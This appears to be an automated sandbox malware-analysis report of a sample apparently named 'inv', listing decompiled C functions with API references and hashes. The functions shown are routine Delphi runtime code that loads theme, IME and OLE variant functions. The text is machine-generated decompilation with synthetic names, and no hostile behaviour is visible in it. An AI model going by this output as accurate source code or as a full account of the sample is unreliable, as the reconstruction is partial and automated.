                                  • Instruction ID: 1b234e7820c650b01842e1b7f681ca0f5447ade2616a200a1d58a18682deaf25
                                  • Opcode Fuzzy Hash: a9467dd3da0ad9118170fbd8614bdaf792fcca640980f35251a04851ee30ca1d
                                  • Instruction Fuzzy Hash: AC11D071640200ABEB54EE69C9C6B5737A8AF08705F4810AABA05DF28BD679EC508759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00421D38(void* __edi, struct HWND__* _a4, signed int _a8) {
                                  				struct _WINDOWPLACEMENT _v48;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t19;
                                  				intOrPtr _t21;
                                  				struct HWND__* _t23;
                                  
                                  				_t19 = _a8;
                                  				_t23 = _a4;
                                  				if( *0x44f921 != 0) {
                                  					if((_t19 & 0x00000003) == 0) {
                                  						if(IsIconic(_t23) == 0) {
                                  							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                  						} else {
                                  							GetWindowPlacement(_t23,  &_v48);
                                  						}
                                  						return E00421CA8( &(_v48.rcNormalPosition), _t19);
                                  					}
                                  					return 0x12340042;
                                  				}
                                  				_t21 =  *0x44f8fc; // 0x421d38
                                  				 *0x44f8fc = E00421B38(1, _t19, _t21, __edi, _t23);
                                  				return  *0x44f8fc(_t23, _t19);
                                  			}











                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: MonitorFromWindow
                                  • API String ID: 190572456-2842599566
                                  • Opcode ID: ffe34b32266510e4eb13a92d87f26274046214b1792b5f0142226068db352507
                                  • Instruction ID: 5a13d5d92fd05d4ddd454ef09ebdc29ba10ae0d0995a427b4100288980ae5fd8
                                  • Opcode Fuzzy Hash: ffe34b32266510e4eb13a92d87f26274046214b1792b5f0142226068db352507
                                  • Instruction Fuzzy Hash: 3B018F75A14528AA8700EB91AC419EB735C9A26354BD04137F81196261D738AA1647FE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00426D20(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				CHAR* _t20;
                                  				long _t25;
                                  				intOrPtr _t30;
                                  				void* _t34;
                                  				intOrPtr _t37;
                                  
                                  				_push(0);
                                  				_t34 = __eax;
                                  				_push(_t37);
                                  				_push(0x426d9d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t37;
                                  				E00426780(__eax);
                                  				_t25 = GetTickCount();
                                  				do {
                                  					Sleep(0);
                                  				} while (GetTickCount() - _t25 <= 0x3e8);
                                  				E00426380(_t34, _t25,  &_v8, 0, __edi, _t34);
                                  				if(_v8 != 0) {
                                  					_t20 = E004042D0(_v8);
                                  					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                  				}
                                  				_pop(_t30);
                                  				 *[fs:eax] = _t30;
                                  				_push(0x426da4);
                                  				return E00403E10( &_v8);
                                  			}










                                  APIs
                                    • Part of subcall function 00426780: WinHelpA.USER32 ref: 0042678F
                                  • GetTickCount.KERNEL32 ref: 00426D3E
                                  • Sleep.KERNEL32(00000000,00000000,00426D9D,?,?,00000000,00000000,?,00426D16), ref: 00426D47
                                  • GetTickCount.KERNEL32 ref: 00426D4C
                                  • WinHelpA.USER32 ref: 00426D82
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CountHelpTick$Sleep
                                  • String ID:
                                  • API String ID: 2438605093-0
                                  • Opcode ID: 587f2c0c6e59002c0f7499b2ea588dfd76fd36732663674fd5b1939995064e7e
                                  • Instruction ID: 71060c31abd0f42595f3aa66d6ec0fb605a907abc284c34ce0954d9a730eca06
                                  • Opcode Fuzzy Hash: 587f2c0c6e59002c0f7499b2ea588dfd76fd36732663674fd5b1939995064e7e
                                  • Instruction Fuzzy Hash: 3101A230700618AFE311EBB6DC46B5E73A8DB48704FE2457BF404A62D1DA7C6E008559
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0042FFB8(void* __eax, intOrPtr* __edx) {
                                  				char _v20;
                                  				char _v28;
                                  				intOrPtr _t17;
                                  				void* _t19;
                                  				void* _t21;
                                  				void* _t32;
                                  				void* _t39;
                                  				void* _t45;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				void* _t50;
                                  				void* _t51;
                                  				intOrPtr* _t65;
                                  				intOrPtr* _t67;
                                  				void* _t68;
                                  
                                  				_t67 = __edx;
                                  				_t50 = __eax;
                                  				_t17 =  *__edx;
                                  				_t68 = _t17 - 0x84;
                                  				if(_t68 > 0) {
                                  					_t19 = _t17 + 0xffffff00 - 9;
                                  					if(_t19 < 0) {
                                  						_t21 = E0042C618(__eax);
                                  						if(_t21 != 0) {
                                  							L28:
                                  							return _t21;
                                  						}
                                  						L27:
                                  						return E0042D128(_t50, _t67);
                                  					}
                                  					if(_t19 + 0xffffff09 - 0xb < 0) {
                                  						_t21 = E0042FF24(__eax, _t51, __edx);
                                  						if(_t21 == 0) {
                                  							goto L27;
                                  						}
                                  						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                                  							goto L28;
                                  						}
                                  						_t21 = E00432804(_t50);
                                  						if(_t21 == 0) {
                                  							goto L28;
                                  						}
                                  						_push( *((intOrPtr*)(_t67 + 8)));
                                  						_push( *((intOrPtr*)(_t67 + 4)));
                                  						_push( *_t67);
                                  						_t32 = E004325A4(_t50);
                                  						_push(_t32);
                                  						L004061D0();
                                  						return _t32;
                                  					}
                                  					goto L27;
                                  				}
                                  				if(_t68 == 0) {
                                  					_t21 = E0042D128(__eax, __edx);
                                  					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                  						goto L28;
                                  					}
                                  					E00406694( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                  					E0042BA34(_t50,  &_v28,  &_v20);
                                  					_t21 = E0042FE90(_t50, 0,  &_v28, 0);
                                  					if(_t21 == 0) {
                                  						goto L28;
                                  					}
                                  					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                                  					return _t21;
                                  				}
                                  				_t39 = _t17 - 7;
                                  				if(_t39 == 0) {
                                  					_t65 = E00442544(__eax);
                                  					if(_t65 == 0) {
                                  						goto L27;
                                  					}
                                  					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
                                  					if(_t21 == 0) {
                                  						goto L28;
                                  					}
                                  					goto L27;
                                  				}
                                  				_t21 = _t39 - 1;
                                  				if(_t21 == 0) {
                                  					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                  						goto L28;
                                  					}
                                  				} else {
                                  					if(_t21 == 0x17) {
                                  						_t45 = E004325A4(__eax);
                                  						if(_t45 == GetCapture() &&  *0x44da94 != 0) {
                                  							_t47 =  *0x44da94; // 0x0
                                  							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                  								_t48 =  *0x44da94; // 0x0
                                  								E0042D05C(_t48, 0, 0x1f, 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}



















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-3916222277
                                  • Opcode ID: ce5a3a7b1ec12c933aa641e11d885e58287bd0ede2bb50b6db310ae9d3043442
                                  • Instruction ID: c1f7e18c609f4fb5e679c84ea5eefe12639155aa3325f822ddf52050d8d32f7b
                                  • Opcode Fuzzy Hash: ce5a3a7b1ec12c933aa641e11d885e58287bd0ede2bb50b6db310ae9d3043442
                                  • Instruction Fuzzy Hash: 5931B03030021047CE28AA399DA671B63959B49318F446A3FE466C7B93CA7ECC06975D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E004239F0(void* __ebx, void* __ecx) {
                                  				char _v5;
                                  				intOrPtr _t2;
                                  				intOrPtr _t6;
                                  				intOrPtr _t108;
                                  				intOrPtr _t111;
                                  
                                  				_t2 =  *0x44fa40; // 0x2190dc8
                                  				E004237E8(_t2);
                                  				_push(_t111);
                                  				_push(0x423da3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t111;
                                  				 *0x44fa3c =  *0x44fa3c + 1;
                                  				if( *0x44fa38 == 0) {
                                  					 *0x44fa38 = LoadLibraryA("uxtheme.dll");
                                  					if( *0x44fa38 > 0) {
                                  						 *0x44f978 = GetProcAddress( *0x44fa38, "OpenThemeData");
                                  						 *0x44f97c = GetProcAddress( *0x44fa38, "CloseThemeData");
                                  						 *0x44f980 = GetProcAddress( *0x44fa38, "DrawThemeBackground");
                                  						 *0x44f984 = GetProcAddress( *0x44fa38, "DrawThemeText");
                                  						 *0x44f988 = GetProcAddress( *0x44fa38, "GetThemeBackgroundContentRect");
                                  						 *0x44f98c = GetProcAddress( *0x44fa38, "GetThemeBackgroundContentRect");
                                  						 *0x44f990 = GetProcAddress( *0x44fa38, "GetThemePartSize");
                                  						 *0x44f994 = GetProcAddress( *0x44fa38, "GetThemeTextExtent");
                                  						 *0x44f998 = GetProcAddress( *0x44fa38, "GetThemeTextMetrics");
                                  						 *0x44f99c = GetProcAddress( *0x44fa38, "GetThemeBackgroundRegion");
                                  						 *0x44f9a0 = GetProcAddress( *0x44fa38, "HitTestThemeBackground");
                                  						 *0x44f9a4 = GetProcAddress( *0x44fa38, "DrawThemeEdge");
                                  						 *0x44f9a8 = GetProcAddress( *0x44fa38, "DrawThemeIcon");
                                  						 *0x44f9ac = GetProcAddress( *0x44fa38, "IsThemePartDefined");
                                  						 *0x44f9b0 = GetProcAddress( *0x44fa38, "IsThemeBackgroundPartiallyTransparent");
                                  						 *0x44f9b4 = GetProcAddress( *0x44fa38, "GetThemeColor");
                                  						 *0x44f9b8 = GetProcAddress( *0x44fa38, "GetThemeMetric");
                                  						 *0x44f9bc = GetProcAddress( *0x44fa38, "GetThemeString");
                                  						 *0x44f9c0 = GetProcAddress( *0x44fa38, "GetThemeBool");
                                  						 *0x44f9c4 = GetProcAddress( *0x44fa38, "GetThemeInt");
                                  						 *0x44f9c8 = GetProcAddress( *0x44fa38, "GetThemeEnumValue");
                                  						 *0x44f9cc = GetProcAddress( *0x44fa38, "GetThemePosition");
                                  						 *0x44f9d0 = GetProcAddress( *0x44fa38, "GetThemeFont");
                                  						 *0x44f9d4 = GetProcAddress( *0x44fa38, "GetThemeRect");
                                  						 *0x44f9d8 = GetProcAddress( *0x44fa38, "GetThemeMargins");
                                  						 *0x44f9dc = GetProcAddress( *0x44fa38, "GetThemeIntList");
                                  						 *0x44f9e0 = GetProcAddress( *0x44fa38, "GetThemePropertyOrigin");
                                  						 *0x44f9e4 = GetProcAddress( *0x44fa38, "SetWindowTheme");
                                  						 *0x44f9e8 = GetProcAddress( *0x44fa38, "GetThemeFilename");
                                  						 *0x44f9ec = GetProcAddress( *0x44fa38, "GetThemeSysColor");
                                  						 *0x44f9f0 = GetProcAddress( *0x44fa38, "GetThemeSysColorBrush");
                                  						 *0x44f9f4 = GetProcAddress( *0x44fa38, "GetThemeSysBool");
                                  						 *0x44f9f8 = GetProcAddress( *0x44fa38, "GetThemeSysSize");
                                  						 *0x44f9fc = GetProcAddress( *0x44fa38, "GetThemeSysFont");
                                  						 *0x44fa00 = GetProcAddress( *0x44fa38, "GetThemeSysString");
                                  						 *0x44fa04 = GetProcAddress( *0x44fa38, "GetThemeSysInt");
                                  						 *0x44fa08 = GetProcAddress( *0x44fa38, "IsThemeActive");
                                  						 *0x44fa0c = GetProcAddress( *0x44fa38, "IsAppThemed");
                                  						 *0x44fa10 = GetProcAddress( *0x44fa38, "GetWindowTheme");
                                  						 *0x44fa14 = GetProcAddress( *0x44fa38, "EnableThemeDialogTexture");
                                  						 *0x44fa18 = GetProcAddress( *0x44fa38, "IsThemeDialogTextureEnabled");
                                  						 *0x44fa1c = GetProcAddress( *0x44fa38, "GetThemeAppProperties");
                                  						 *0x44fa20 = GetProcAddress( *0x44fa38, "SetThemeAppProperties");
                                  						 *0x44fa24 = GetProcAddress( *0x44fa38, "GetCurrentThemeName");
                                  						 *0x44fa28 = GetProcAddress( *0x44fa38, "GetThemeDocumentationProperty");
                                  						 *0x44fa2c = GetProcAddress( *0x44fa38, "DrawThemeParentBackground");
                                  						 *0x44fa30 = GetProcAddress( *0x44fa38, "EnableTheming");
                                  					}
                                  				}
                                  				_v5 =  *0x44fa38 > 0;
                                  				_pop(_t108);
                                  				 *[fs:eax] = _t108;
                                  				_push(0x423daa);
                                  				_t6 =  *0x44fa40; // 0x2190dc8
                                  				return E004237F0(_t6);
                                  			}









                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00423DA3), ref: 00423A26
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00423A3E
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00423A50
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 00423A62
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00423A74
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00423A86
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00423A98
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 00423AAA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00423ABC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00423ACE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00423AE0
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00423AF2
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00423B04
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 00423B16
                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00423B28
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00423B3A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00423B4C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00423B5E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00423B70
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 00423B82
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 00423B94
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 00423BA6
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 00423BB8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 00423BCA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00423BDC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00423BEE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00423C00
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00423C12
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00423C24
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 00423C36
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00423C48
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00423C5A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00423C6C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00423C7E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 00423C90
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00423CA2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00423CB4
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00423CC6
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00423CD8
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00423CEA
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00423CFC
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00423D0E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00423D20
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00423D32
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00423D44
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 00423D56
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00423D68
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 00423D7A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  • API String ID: 2238633743-2910565190
                                  • Opcode ID: 894e4f1e99a824bb32007d5b3563c58f3b6ad6c70a40204f8856db3567b65ccf
                                  • Instruction ID: 32d8e9dda109dd1cedbabccab8db552a29068f61de417213d39679b414b1be6d
                                  • Opcode Fuzzy Hash: 894e4f1e99a824bb32007d5b3563c58f3b6ad6c70a40204f8856db3567b65ccf
                                  • Instruction Fuzzy Hash: 8BA1F0B5B04A20AFDB00DFB5EC86A2A37A8EB0AB447940576B400EF295D67C9904CF5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00436C9C() {
                                  				int _v8;
                                  				intOrPtr _t4;
                                  				struct HINSTANCE__* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t15;
                                  				struct HINSTANCE__* _t17;
                                  				struct HINSTANCE__* _t19;
                                  				struct HINSTANCE__* _t21;
                                  				struct HINSTANCE__* _t23;
                                  				struct HINSTANCE__* _t25;
                                  				struct HINSTANCE__* _t27;
                                  				struct HINSTANCE__* _t29;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t44;
                                  
                                  				_t42 = _t44;
                                  				_t4 =  *0x44e114; // 0x44f740
                                  				if( *((char*)(_t4 + 0xc)) == 0) {
                                  					return _t4;
                                  				} else {
                                  					_v8 = SetErrorMode(0x8000);
                                  					_push(_t42);
                                  					_push(0x436e02);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t44;
                                  					if( *0x44fb64 == 0) {
                                  						 *0x44fb64 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                  					}
                                  					if( *0x44db00 == 0) {
                                  						 *0x44db00 = LoadLibraryA("imm32.dll");
                                  						if( *0x44db00 != 0) {
                                  							_t11 =  *0x44db00; // 0x0
                                  							 *0x44fb68 = GetProcAddress(_t11, "ImmGetContext");
                                  							_t13 =  *0x44db00; // 0x0
                                  							 *0x44fb6c = GetProcAddress(_t13, "ImmReleaseContext");
                                  							_t15 =  *0x44db00; // 0x0
                                  							 *0x44fb70 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                  							_t17 =  *0x44db00; // 0x0
                                  							 *0x44fb74 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                  							_t19 =  *0x44db00; // 0x0
                                  							 *0x44fb78 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                  							_t21 =  *0x44db00; // 0x0
                                  							 *0x44fb7c = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                  							_t23 =  *0x44db00; // 0x0
                                  							 *0x44fb80 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                  							_t25 =  *0x44db00; // 0x0
                                  							 *0x44fb84 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                  							_t27 =  *0x44db00; // 0x0
                                  							 *0x44fb88 = GetProcAddress(_t27, "ImmIsIME");
                                  							_t29 =  *0x44db00; // 0x0
                                  							 *0x44fb8c = GetProcAddress(_t29, "ImmNotifyIME");
                                  						}
                                  					}
                                  					_pop(_t40);
                                  					 *[fs:eax] = _t40;
                                  					_push(0x436e09);
                                  					return SetErrorMode(_v8);
                                  				}
                                  			}



















                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 00436CB5
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00436E02,?,00008000), ref: 00436CD9
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436CE6
                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E02,?,00008000), ref: 00436D02
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D24
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436D39
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436D4E
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436D63
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436D78
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436D8D
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436DA2
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436DB7
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436DCC
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436DE1
                                  • SetErrorMode.KERNEL32(?,00436E09,00008000), ref: 00436DFC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-3950384806
                                  • Opcode ID: 1a0eca1e7b9a1f21f434a4e0cc69b1be7aeb05f7b79684b77ff6610deaca4bfa
                                  • Instruction ID: e5f94a84032ef7403cc1fea1a4322095b057e0b0f2a862b79d299bc1d1a8339c
                                  • Opcode Fuzzy Hash: 1a0eca1e7b9a1f21f434a4e0cc69b1be7aeb05f7b79684b77ff6610deaca4bfa
                                  • Instruction Fuzzy Hash: 9531217EA44A81AED701DBB5DC16A2636E8E70FB44F56543AB000A7191D67CAC08CF5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D420() {
                                  				struct HINSTANCE__* _v8;
                                  				intOrPtr _t46;
                                  				void* _t91;
                                  
                                  				_v8 = GetModuleHandleA("oleaut32.dll");
                                  				 *0x44f7a0 = E0040D3F4("VariantChangeTypeEx", E0040CF90, _t91);
                                  				 *0x44f7a4 = E0040D3F4("VarNeg", E0040CFC0, _t91);
                                  				 *0x44f7a8 = E0040D3F4("VarNot", E0040CFC0, _t91);
                                  				 *0x44f7ac = E0040D3F4("VarAdd", E0040CFCC, _t91);
                                  				 *0x44f7b0 = E0040D3F4("VarSub", E0040CFCC, _t91);
                                  				 *0x44f7b4 = E0040D3F4("VarMul", E0040CFCC, _t91);
                                  				 *0x44f7b8 = E0040D3F4("VarDiv", E0040CFCC, _t91);
                                  				 *0x44f7bc = E0040D3F4("VarIdiv", E0040CFCC, _t91);
                                  				 *0x44f7c0 = E0040D3F4("VarMod", E0040CFCC, _t91);
                                  				 *0x44f7c4 = E0040D3F4("VarAnd", E0040CFCC, _t91);
                                  				 *0x44f7c8 = E0040D3F4("VarOr", E0040CFCC, _t91);
                                  				 *0x44f7cc = E0040D3F4("VarXor", E0040CFCC, _t91);
                                  				 *0x44f7d0 = E0040D3F4("VarCmp", E0040CFD8, _t91);
                                  				 *0x44f7d4 = E0040D3F4("VarI4FromStr", E0040CFE4, _t91);
                                  				 *0x44f7d8 = E0040D3F4("VarR4FromStr", E0040D050, _t91);
                                  				 *0x44f7dc = E0040D3F4("VarR8FromStr", E0040D0BC, _t91);
                                  				 *0x44f7e0 = E0040D3F4("VarDateFromStr", E0040D128, _t91);
                                  				 *0x44f7e4 = E0040D3F4("VarCyFromStr", E0040D194, _t91);
                                  				 *0x44f7e8 = E0040D3F4("VarBoolFromStr", E0040D200, _t91);
                                  				 *0x44f7ec = E0040D3F4("VarBstrFromCy", E0040D280, _t91);
                                  				 *0x44f7f0 = E0040D3F4("VarBstrFromDate", E0040D2F0, _t91);
                                  				_t46 = E0040D3F4("VarBstrFromBool", E0040D360, _t91);
                                  				 *0x44f7f4 = _t46;
                                  				return _t46;
                                  			}







                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040D429
                                    • Part of subcall function 0040D3F4: GetProcAddress.KERNEL32(00000000), ref: 0040D40D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
